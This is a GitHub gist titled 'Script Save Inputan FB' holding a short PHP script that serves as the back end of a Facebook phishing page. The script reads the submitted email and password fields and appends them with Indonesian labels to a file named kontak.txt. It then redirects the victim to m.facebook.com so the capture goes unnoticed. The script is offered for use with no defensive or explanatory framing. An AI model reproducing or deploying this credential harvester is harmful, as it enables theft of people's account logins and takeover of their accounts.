Skip to content

Instantly share code, notes, and snippets.

@fakhrikmt
Last active August 4, 2017 10:07
Show Gist options
  • Save fakhrikmt/f6fd09b9e3d99874f6587b9ac541fa7a to your computer and use it in GitHub Desktop.
Save fakhrikmt/f6fd09b9e3d99874f6587b9ac541fa7a to your computer and use it in GitHub Desktop.
Script Save Inputan FB
<?php
header ("Location: http://m.facebook.com");
$ADEx = "kontak.txt";
$ADEy = $_POST['email'];
$ADEz = $_POST['pass'];
$handle = fopen($ADEx, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email atau Telepon : ");
fwrite($handle, "$ADEy");
fwrite($handle, "\n");
fwrite($handle, "Kata Sandi : ");
fwrite($handle, "$ADEz");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fclose($handle);
exit;
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment